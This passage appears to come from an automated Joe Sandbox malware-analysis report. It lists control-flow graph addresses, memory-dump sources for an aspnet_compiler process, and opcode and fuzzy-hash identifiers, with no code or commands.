1f59dd42d47-1f59dd42d59 191->193 192->191 192->192 194 1f59dd42d5b-1f59dd42d6f 193->194 195 1f59dd42d71-1f59dd42d74 SafeArrayDestroy 193->195 194->194 194->195 195->170
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F59DD20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1f59dd20000_aspnet_compiler.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocArrayCreateDestroyInstanceSafeString
                                                                  • String ID:
                                                                  • API String ID: 815377780-0
                                                                  • Opcode ID: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
                                                                  • Instruction ID: ce26cd8bea8e9accfc76c86ca8b67b2ff18164e07fa7a13e8a09d83f1223ac4f
                                                                  • Opcode Fuzzy Hash: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
                                                                  • Instruction Fuzzy Hash: BC418D31218F098FD75CEE28D899AF6B7E5FB95318F00562ED58AC7091EB31E5058BC2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 357 7ff848fe4da2-7ff848fe4da9 358 7ff848fe4dac-7ff848fe4e1e 357->358 359 7ff848fe4dab 357->359 361 7ff848fe4e25-7ff848fe4e82 358->361 362 7ff848fe4e20 358->362 359->358 367 7ff848fe4e84-7ff848fe4eb9 361->367 368 7ff848fe4eba-7ff848fe4f35 361->368 362->361 367->368 375 7ff848fe4f3b-7ff848fe4f48 368->375 376 7ff848fe4f4d-7ff848fe4ffa 375->376
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f094ba2f943aa6c241eb5dbe3a3ef1d2d7b67655451dcca301e77ebf2c168927
                                                                  • Instruction ID: 1cc2c8e03bbe85dd18e32678ca519fea6e315dba2abbc1922c7737a38e5e9300
                                                                  • Opcode Fuzzy Hash: f094ba2f943aa6c241eb5dbe3a3ef1d2d7b67655451dcca301e77ebf2c168927
                                                                  • Instruction Fuzzy Hash: 2B91DB70D08A5C9FDB94EF68C859BA8BBF1FF69301F0441AAD04DE7292DB349885CB41

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba76b163fccd90517b140623544afea676846913d7844254f664fa734784386e
                                                                  • Instruction ID: 7086990f45e81289438d63b6f85e87c9b02d42702594077cee38d7cb7e96c94b
                                                                  • Opcode Fuzzy Hash: ba76b163fccd90517b140623544afea676846913d7844254f664fa734784386e
                                                                  • Instruction Fuzzy Hash: 2F812D70D0CA5C8FDB94EB68C459BA9BBF1FF58300F1041AAD04EE7291CB389985CB15

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 416 7ff848fe31ec-7ff848fe3202 417 7ff848fe3204-7ff848fe3222 416->417 418 7ff848fe324c-7ff848fe3297 416->418 417->418 421 7ff848fe329e-7ff848fe32f3 418->421 422 7ff848fe3299 418->422 423 7ff848fe32fe-7ff848fe3310 421->423 422->421 424 7ff848fe3317-7ff848fe3321 423->424 425 7ff848fe3312 423->425 426 7ff848fe3326-7ff848fe3330 424->426 427 7ff848fe3323-7ff848fe3324 424->427 425->424 428 7ff848fe3337-7ff848fe3353 426->428 429 7ff848fe3332 426->429 430 7ff848fe3356-7ff848fe33c0 427->430 428->430 429->428 435 7ff848fe341e-7ff848fe3447 430->435 437 7ff848fe33c2-7ff848fe341d 435->437 438 7ff848fe344d-7ff848fe346e call 7ff848fe346f 435->438 437->435
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78e692ff0bca73c2fd7e040e325dedb3ecd145146993e23d6d364907d4ee9032
                                                                  • Instruction ID: dddda91146935d878be2b68137813e3ebf2762d19175763ea0740de484bdf337
                                                                  • Opcode Fuzzy Hash: 78e692ff0bca73c2fd7e040e325dedb3ecd145146993e23d6d364907d4ee9032
                                                                  • Instruction Fuzzy Hash: A5812870909A5C9FDB94EB68C459BA8BBF1FF59300F1041EED04EE7291CB39A985CB05

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 446 7ff848fe4a55-7ff848fe4a62 447 7ff848fe4a64-7ff848fe4a82 446->447 448 7ff848fe4aac-7ff848fe4af7 446->448 447->448 451 7ff848fe4afe-7ff848fe4b53 448->451 452 7ff848fe4af9 448->452 453 7ff848fe4b5e-7ff848fe4b70 451->453 452->451 454 7ff848fe4b77-7ff848fe4b81 453->454 455 7ff848fe4b72 453->455 456 7ff848fe4b86-7ff848fe4b90 454->456 457 7ff848fe4b83-7ff848fe4b84 454->457 455->454 459 7ff848fe4b97-7ff848fe4bb3 456->459 460 7ff848fe4b92 456->460 458 7ff848fe4bb6-7ff848fe4bc6 457->458 461 7ff848fe4c10-7ff848fe4c20 458->461 462 7ff848fe4bc8-7ff848fe4c0e 458->462 459->458 460->459 464 7ff848fe4c7e-7ff848fe4ca7 461->464 462->461 467 7ff848fe4c22-7ff848fe4c7d 464->467 468 7ff848fe4cad-7ff848fe4cce call 7ff848fe4ccf 464->468 467->464
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8cbfc2097caf03848f4da0b1190ceb2644dfaee2e0c9000b206cebd2f07af3fb
                                                                  • Instruction ID: a63a62a576716ca68ebca56d9dfb0ec0fef36fc3c17db75bfed36ce73784a189
                                                                  • Opcode Fuzzy Hash: 8cbfc2097caf03848f4da0b1190ceb2644dfaee2e0c9000b206cebd2f07af3fb
                                                                  • Instruction Fuzzy Hash: E2811A70D09A5D8FDB94EB68C459BA8BBF1FF69301F1041AED04EE7291CB389985CB05

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 477 7ff848fe3605-7ff848fe3612 478 7ff848fe3614-7ff848fe3632 477->478 479 7ff848fe365c-7ff848fe36a7 477->479 478->479 482 7ff848fe36ae-7ff848fe3703 479->482 483 7ff848fe36a9 479->483 484 7ff848fe370e-7ff848fe3720 482->484 483->482 485 7ff848fe3727-7ff848fe3731 484->485 486 7ff848fe3722 484->486 487 7ff848fe3736-7ff848fe3740 485->487 488 7ff848fe3733-7ff848fe3734 485->488 486->485 490 7ff848fe3747-7ff848fe3763 487->490 491 7ff848fe3742 487->491 489 7ff848fe3766-7ff848fe3776 488->489 492 7ff848fe37c0-7ff848fe37d0 489->492 493 7ff848fe3778-7ff848fe37be 489->493 490->489 491->490 495 7ff848fe382e-7ff848fe3857 492->495 493->492 498 7ff848fe37d2-7ff848fe382d 495->498 499 7ff848fe385d-7ff848fe387e call 7ff848fe387f 495->499 498->495
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b9c3e39723c36eb4c1a381c5cb216d2d904ed74993821e354810ce840e42d26
                                                                  • Instruction ID: 4932314b0142ea766e9932154a260bd345c396fb7753e9c7bae19e26793d7c9e
                                                                  • Opcode Fuzzy Hash: 5b9c3e39723c36eb4c1a381c5cb216d2d904ed74993821e354810ce840e42d26
                                                                  • Instruction Fuzzy Hash: DE812DB090D65D8FDB94EB68C499BA8BBF1FF59300F1041EAD04EE7291CB389985CB05

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 508 7ff848fe0598-7ff848fe4e1e 510 7ff848fe4e25-7ff848fe4e82 508->510 511 7ff848fe4e20 508->511 516 7ff848fe4e84-7ff848fe4eb9 510->516 517 7ff848fe4eba-7ff848fe4f48 510->517 511->510 516->517 525 7ff848fe4f4d-7ff848fe4ffa 517->525
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2b60a7ca4db4d2fc819a5cd1e63bf0e0062924b4c3846f5fdd94c3db3706b7d
                                                                  • Instruction ID: 8b015179c8b97871a9951e76d6176e381a1448fed1cf99075e3a8a0f1591eee7
                                                                  • Opcode Fuzzy Hash: a2b60a7ca4db4d2fc819a5cd1e63bf0e0062924b4c3846f5fdd94c3db3706b7d
                                                                  • Instruction Fuzzy Hash: 77718470A08A1D9FDB94EF68C899BADB7F1FB69301F1041A9D00DE7295DB34A885CB40

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 532 7ff848fe2a17-7ff848fe2a87 538 7ff848fe2a8e-7ff848fe2ae3 532->538 539 7ff848fe2a89 532->539 540 7ff848fe2aee-7ff848fe2b00 538->540 539->538 541 7ff848fe2b07-7ff848fe2b11 540->541 542 7ff848fe2b02 540->542 543 7ff848fe2b16-7ff848fe2b20 541->543 544 7ff848fe2b13-7ff848fe2b14 541->544 542->541 546 7ff848fe2b27-7ff848fe2b43 543->546 547 7ff848fe2b22 543->547 545 7ff848fe2b46-7ff848fe2b56 544->545 548 7ff848fe2ba0-7ff848fe2bb0 545->548 549 7ff848fe2b58-7ff848fe2b9e 545->549 546->545 547->546 550 7ff848fe2c0e-7ff848fe2c37 548->550 549->548 554 7ff848fe2bb2-7ff848fe2c0d 550->554 555 7ff848fe2c3d-7ff848fe2c5e call 7ff848fe2c5f 550->555 554->550
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd97997f793fd3dec1b2d706e2cb6202a7e01890bc88854158b37936e357a013
                                                                  • Instruction ID: 2a90e0337605b852453eefb3fd2f6158884b0c2ba842cd940d66ef496799b9e3
                                                                  • Opcode Fuzzy Hash: bd97997f793fd3dec1b2d706e2cb6202a7e01890bc88854158b37936e357a013
                                                                  • Instruction Fuzzy Hash: 9E811A70D18A5D9FDB98EF68C455BA8BBF1FF58300F5041AAD00DE7291DB38A985CB05

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a855db084c72a8497a859336a85703c6f4b82932f78d4922e4def1e9534376f
                                                                  • Instruction ID: c09b46c67072f43c592b2abc7e6b3bf56ceddb1c28557ae3104bac4046466049
                                                                  • Opcode Fuzzy Hash: 0a855db084c72a8497a859336a85703c6f4b82932f78d4922e4def1e9534376f
                                                                  • Instruction Fuzzy Hash: D2717270D0DA8D9FDB95EBA8D455AACBBF0FF59311F0501A9D049E72A2CB389C81CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 06beec6220cf8f90f272972c41ece1c206016af230664debd92ae86d96cd5d60
                                                                  • Instruction ID: 8d67220209807c3e33b44dfe8cc2802addc9cabb28e3344c028031b4975ed9b3
                                                                  • Opcode Fuzzy Hash: 06beec6220cf8f90f272972c41ece1c206016af230664debd92ae86d96cd5d60
                                                                  • Instruction Fuzzy Hash: 7771497090DA5D8FDB94EB688459BB8BBE1FF68300F1001EEC04ED7691CB38A985CB05
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 90b0eb0fc9f3faafd763ff2ea2c9fce77a8ce9e6f9a7c4bd60707eb1a9f4e237
                                                                  • Instruction ID: d3772b50b22a7dd281e31a70ac7ecf11bebed86b76d7b5aa027f05dcfa65ff12
                                                                  • Opcode Fuzzy Hash: 90b0eb0fc9f3faafd763ff2ea2c9fce77a8ce9e6f9a7c4bd60707eb1a9f4e237
                                                                  • Instruction Fuzzy Hash: 4C71187090DA599FDB98EB68C459BB8BBF1FF58300F1041AED04ED7291CB399985CB05
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb2df72a50469a03dc964b9f8b0482a807f189c7ad4b73df82482b3cfd9cc40e
                                                                  • Instruction ID: 427debfa502ace800198c8c30050c613fbbca7cf8dc8ceef3fa847e9bd28fc86
                                                                  • Opcode Fuzzy Hash: fb2df72a50469a03dc964b9f8b0482a807f189c7ad4b73df82482b3cfd9cc40e
                                                                  • Instruction Fuzzy Hash: C7713970D0DA588FDB94EB68C459BA8BBE1FF69301F5041EED04EE7291CB385985CB05
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98be3e867d325dd36b22442e6a83dd2e3701126c60112f5aea48ebc9fd03c242
                                                                  • Instruction ID: f32593779b13a88a755c59a1df5d0596e1dc22444a8e76ecc690c8d594bca3c7
                                                                  • Opcode Fuzzy Hash: 98be3e867d325dd36b22442e6a83dd2e3701126c60112f5aea48ebc9fd03c242
                                                                  • Instruction Fuzzy Hash: 0A51FE319AF24B9FE35173A854FE6FB1650EF8B384F846D7AE90C494D38E8C75044269
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e9a540fcdf42d7fe45afa7e2b7e6c1b6b627a025412f11be2db9b3277ea6003
                                                                  • Instruction ID: d5430df4e9b8e6f1b5c296e7c322552f1ddefa0f4282a28d43e439d20073a444
                                                                  • Opcode Fuzzy Hash: 0e9a540fcdf42d7fe45afa7e2b7e6c1b6b627a025412f11be2db9b3277ea6003
                                                                  • Instruction Fuzzy Hash: C5717930C0D61E8FEBA9EB14C845AF9B7B1FF64340F0042B9D41A971D1EB386A89CB54
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2678d4486fa8f887e66a4ccf352370ca4ef2bd47ab10f80b9a4dba5b4e5ecbd5
                                                                  • Instruction ID: 69d0a2d3e4d6d4ddf9aea1468b2d34bd7c9ed7a58b62c4d2ac0de08817d904d9
                                                                  • Opcode Fuzzy Hash: 2678d4486fa8f887e66a4ccf352370ca4ef2bd47ab10f80b9a4dba5b4e5ecbd5
                                                                  • Instruction Fuzzy Hash: E6512970D0CA5D9FDB98EB688459BB9BBF1FF59300F4001AAD04ED7291CB38A980CB15
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c76b3eae8444dfab49174e256f5fb0da34e49b55c097cec1368fddf400627e4a
                                                                  • Instruction ID: 295377709f1888d22d38ae6d74f3049788f0d47cc1f021f29fb5fe1a4de19f28
                                                                  • Opcode Fuzzy Hash: c76b3eae8444dfab49174e256f5fb0da34e49b55c097cec1368fddf400627e4a
                                                                  • Instruction Fuzzy Hash: 7E512870D0DA5D9FDB98EB688459BB9BBF1FF59300F5401AAD04DE7291CB38A980CB05
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3acf45e2d79b903b72593a6f34d6af86b38e9d3876f8528728aee44971a3703
                                                                  • Instruction ID: d03c7e6872b0bfbae91a1193ac9c71c79d2b483de136f2deeaf90175dc42fc17
                                                                  • Opcode Fuzzy Hash: a3acf45e2d79b903b72593a6f34d6af86b38e9d3876f8528728aee44971a3703
                                                                  • Instruction Fuzzy Hash: DF510870D09A5D9FDB98EB688459BB9BBF1FF59300F4041A9D04ED7291CB38A980CB15
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d6fc9ed60b3fb43af708b4e3d267d65cb1a05bcede378ae25c7daa7f81786bd2
                                                                  • Instruction ID: 2f9dcbdd26c33eda896fd22d0b4a36b7aba4e5b047ccee4b6c670f56ba668385
                                                                  • Opcode Fuzzy Hash: d6fc9ed60b3fb43af708b4e3d267d65cb1a05bcede378ae25c7daa7f81786bd2
                                                                  • Instruction Fuzzy Hash: 96510670D0CA599FDB98EB688455BB9BBF1FF69301F4001AAD04ED7291CB39A984CB05
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4c198f0991b53c22f5492f89bb22800f7a7441a7565a1eb0ab39fc0d7c2b393
                                                                  • Instruction ID: b0dd5074ac8c0fa3c4ae8754749827394241e77739922769da564e092b217213
                                                                  • Opcode Fuzzy Hash: f4c198f0991b53c22f5492f89bb22800f7a7441a7565a1eb0ab39fc0d7c2b393
                                                                  • Instruction Fuzzy Hash: CC510770D09A599FDB98EB688455BB9BBE1FF69300F5001AED04ED7291CB389980CB15
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 670923b38e2ac39bd8eef82bf8e34d537d11c4674003376cd5738eee32b6c491
                                                                  • Instruction ID: d94c9790527d74a1502897bc5e6c366d401285baacc4e950ce18af063887c956
                                                                  • Opcode Fuzzy Hash: 670923b38e2ac39bd8eef82bf8e34d537d11c4674003376cd5738eee32b6c491
                                                                  • Instruction Fuzzy Hash: B7513770D0DA599FDB98EB688455BB9BBE1FF69300F5001AED04EE3291CB386984CB15
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c935e4fe27275133db1370436749ecc0a816d86de780ee91badeb4f23c41b7de
                                                                  • Instruction ID: 4361ae2de006d1eda67a1743f0d95d512f4c25524684858750977d7fe86307c5
                                                                  • Opcode Fuzzy Hash: c935e4fe27275133db1370436749ecc0a816d86de780ee91badeb4f23c41b7de
                                                                  • Instruction Fuzzy Hash: 2F510870D0DA599FDB98EB688455BB9BBF1FF69301F4041AED04DD7292CB386980CB05
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a3d9a92cbcb1a86ca321164fb3b750f5bd5da84a1fb03981a8005e950dc64c7
                                                                  • Instruction ID: 49c207d876a0d1d37f52d8a7d72577276ce598ffb36a48826e4ff4467ce6aaa0
                                                                  • Opcode Fuzzy Hash: 6a3d9a92cbcb1a86ca321164fb3b750f5bd5da84a1fb03981a8005e950dc64c7
                                                                  • Instruction Fuzzy Hash: 5F517B30C0D6498FDB55EF64C4596BEBBB1FF0A311F1400A9D00A9B1D2CB3D6846CB59
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 026db001f2a2d3897a56d29b10152e53d01d63406cf4cb71856035ed217f66a3
                                                                  • Instruction ID: d2de39fd34e57d15023cfa73f9c432518c750b1a9f3b6e8b5850e5addbca128d
                                                                  • Opcode Fuzzy Hash: 026db001f2a2d3897a56d29b10152e53d01d63406cf4cb71856035ed217f66a3
                                                                  • Instruction Fuzzy Hash: 9831E231C0C64A9FE795B768A8661FC7BE0FF95260F05007AD489975D3CE2C28478B65
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6293d6d84644b75f313705cf445d4253d6f1d7f86895fb2d7d48c64a04b7c0f
                                                                  • Instruction ID: 471ddd6ba4149d5dac885d04966d836334a10e984077720f6bdfe15d449a9759
                                                                  • Opcode Fuzzy Hash: c6293d6d84644b75f313705cf445d4253d6f1d7f86895fb2d7d48c64a04b7c0f
                                                                  • Instruction Fuzzy Hash: BD31F03188D68E9FD7029B789C186F97BE8EF8A220F0401B7D048CB0D2D72C599AC765
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e33c80a3111aded61a0f0fe9266004b14300ecf70870dc48ca27600d240f135e
                                                                  • Instruction ID: f921a5c8a600da860489935f380797cef8d5a2dc141cf216cecb9dd69ebb209e
                                                                  • Opcode Fuzzy Hash: e33c80a3111aded61a0f0fe9266004b14300ecf70870dc48ca27600d240f135e
                                                                  • Instruction Fuzzy Hash: A2310231C0C68A9FE791BB68A8655FC7BE0FF85260F04017AD489975D2CE2C2C438B15
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d301cec05dc463e0d082e5a5c8b84dd8795471a8ddf79c5e8fae060b9457e818
                                                                  • Instruction ID: da932ff2d39a819ed96c25ae75cd532167817f336f040c3b5d1ecebd0ae841ff
                                                                  • Opcode Fuzzy Hash: d301cec05dc463e0d082e5a5c8b84dd8795471a8ddf79c5e8fae060b9457e818
                                                                  • Instruction Fuzzy Hash: A931F171D0D64E9FE746AB68D4296B9BBE0FF44360F0401BAC049C71C2EA2C1846C766
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 727d178a00a18c94c29b59a6b9303c5d0eae347c6d346df105b90cccc8f34324
                                                                  • Instruction ID: b786e30a087210272aef73bf98db09b003941a73ea47acae3ad5393491d2b753
                                                                  • Opcode Fuzzy Hash: 727d178a00a18c94c29b59a6b9303c5d0eae347c6d346df105b90cccc8f34324
                                                                  • Instruction Fuzzy Hash: E8416730C0E6898FDB5AEB64C865AF8BBB1EF16310F0541EAD049D72D2DB3C5A85CB15
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a9b086cf5439690f95d87aac40d53c67fbb2950b5f334cd6423b3e15886586b
                                                                  • Instruction ID: c98201ddea0a2f4629cff7541c2f3b8fc759db587b6c423ac26479629a879765
